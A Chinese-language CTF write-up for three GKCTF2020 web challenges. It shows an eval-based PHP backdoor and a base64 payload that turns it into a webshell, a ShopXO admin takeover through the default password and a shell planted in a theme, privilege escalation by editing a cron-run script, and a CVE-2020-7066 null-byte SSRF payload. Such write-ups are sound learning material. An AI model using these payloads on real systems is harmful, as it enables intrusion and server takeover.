GKCTF2020-web
上個網課,作業多的一批,週末都還有課,真的服!!!
[GKCTF2020]CheckIN
打開題目得到源碼:
<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
public $code = null;
public $decode = null;
function __construct()
{
$this->code = @$this->x()['Ginkgo'];
$this->decode = @base64_decode( $this->code );
@Eval($this->decode);
}
public function x()
{
return $_REQUEST;
}
}
new ClassName();
一個簡單的命令執行,直接執行phpinfo();:
禁用了很多函數,估計又是bypass的題目,事後證明確實,因爲又是需要執行readflag
執行url如下:
http://d81739ba-e081-483b-97ba-e30312f3a239.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==
然後蟻劍鏈接,選base64:
成功的到shell:
直接上傳bypass腳本,然後包含即可:
得到flag:
[GKCTF2020]老八小超市兒
shopxo的漏洞,直接百度一手,找到後臺getshell的方法,照着操作就能得到shell
先進入後臺,admin默認密碼shopxo直接登錄,之後找到主題下載:
然後在下載的主題的\default\_static_插入自己的shell,然後去安裝主題:
然後蟻劍鏈接:/public/static/index/default/shell.php
之後發現flag是假的,而且提示真的在root下,之後發現有個auto.sh,自動執行py文件:
找到py文件,對其進行修改即可:
等上一分鐘,訪問1.txt:
[GKCTF2020]cve版簽到
題目有提示了:cve2020-7066
貌似是get_headers()函數中的內容可以被%00截斷,返回到題目說是:
直接傳入:?url=http://127.0.0.1%00.ctfhub.com
:
按照提示傳入:?url=http://127.0.0.123%00.ctfhub.com,直接出flag: